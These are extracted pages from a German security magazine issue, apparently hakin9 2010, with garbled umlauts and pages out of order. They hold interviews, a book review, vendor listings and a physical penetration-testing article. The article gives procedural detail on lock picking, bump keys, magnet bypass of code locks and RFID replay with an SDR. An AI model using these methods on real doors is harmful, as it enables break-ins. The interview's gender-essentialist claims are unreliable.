hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
